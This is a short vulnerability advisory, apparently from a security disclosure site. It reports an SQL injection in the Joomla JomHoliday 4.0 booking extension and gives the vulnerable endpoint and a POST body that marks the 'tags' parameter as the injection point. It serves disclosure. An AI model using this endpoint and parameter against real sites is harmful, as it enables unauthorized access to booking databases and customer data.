Joomla JomHoliday 4.0 SQL Injection

2017.12.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Joomla JomHoliday 4.0 - SQL Injection #Credit: Bilal KARDADOU #Vendor: http://comdev.eu #URL: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jomholiday/ #Product: 'Joomla JomHoliday 4.0' #Developer: Comdev #Extension type: Plugin #Last updated: Oct 29 2017 #Compatibility: 3.X #Type: Paid download #Google Dork: N/A ################################################ # # Description: # Are you looking to create a booking site that is sophisticated yet simple? Be it a hotel trying to beat the competition with its innovative booking site, # a travel agent with a flexible booking system to cater to various holiday destination or a full-fledged website in the likes of booking.com or airbnb, # what you need is a flexible booking system that lets you customize as per your personal taste. # # POST -p [tags] # # http://127.0.0.1/joomla/index.php?option=com_jomcomdev&task=maps.itemsjh&format=json&extension=com_jomholiday&limit=100 # # address-lat-lng=&distance=25&latitude=&longitude=&tags=[SQL]&categories_id=85&categories_type_id=&price=0%3B5000&search=&favorites=0&featured=0&2905742ed14936f3401fd92da86943f2=1& # # PoC: # https://prnt.sc/hu0s58 # # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top